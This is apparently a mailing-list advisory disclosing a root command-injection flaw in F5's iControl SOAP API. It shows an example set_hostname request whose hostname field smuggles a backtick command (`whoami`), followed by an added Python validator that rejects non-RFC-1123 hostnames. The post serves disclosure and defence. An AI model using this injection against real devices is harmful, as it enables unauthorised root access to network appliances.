Hi,
Linked below is an advisory regarding remote command execution (as root,
possibly) vulnerabilities within the iControl API:
An example request that will set the hostname to 'root.example.com':
<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope>
  <SOAP-ENV:Body>
    <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
      <hostname>`whoami`.example.com</hostname>
    </n1:set_hostname>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
This was responsibly disclosed to F5 on the 7th of February. If you
would like the full communication timeline, feel free to ask.
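
Added example, not part of the original post and not F5 code: one way a filtering proxy or log reviewer could check the hostname argument of a set_hostname call against the RFC 1123 hostname grammar, so that a value like the one in the request above is rejected before it reaches the device. The function names and the SOAP-ENV namespace declaration in the constructed sample are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# RFC 1123 label: letters, digits, hyphens; no leading/trailing hyphen; max 63 chars.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
INET_NS = "urn:iControl:System/Inet"  # namespace taken from the request in the post

# Constructed sample request. The SOAP-ENV namespace URI (standard SOAP 1.1)
# is an assumption; the post's request does not show it.
SAMPLE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
      <hostname>%s</hostname>
    </n1:set_hostname>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

def is_valid_hostname(value):
    """Allow-list check: every dot-separated label must match RFC 1123."""
    if not value or len(value) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in value.split("."))

def check_set_hostname(soap_xml):
    """Return the hostname values in set_hostname calls that fail validation."""
    # For untrusted input in production, prefer a hardened parser (e.g. defusedxml).
    root = ET.fromstring(soap_xml)
    rejected = []
    for call in root.iter("{%s}set_hostname" % INET_NS):
        for elem in call.iter("hostname"):
            value = elem.text or ""
            if not is_valid_hostname(value):
                rejected.append(value)
    return rejected

if __name__ == "__main__":
    for candidate in (b"root.example.com", b"`whoami`.example.com"):
        print(candidate, "->", check_set_hostname(SAMPLE % candidate) or "ok")
```

An allow-list on the hostname grammar is used here rather than a deny-list of shell metacharacters, since anything outside letters, digits, hyphens and dots has no place in the field.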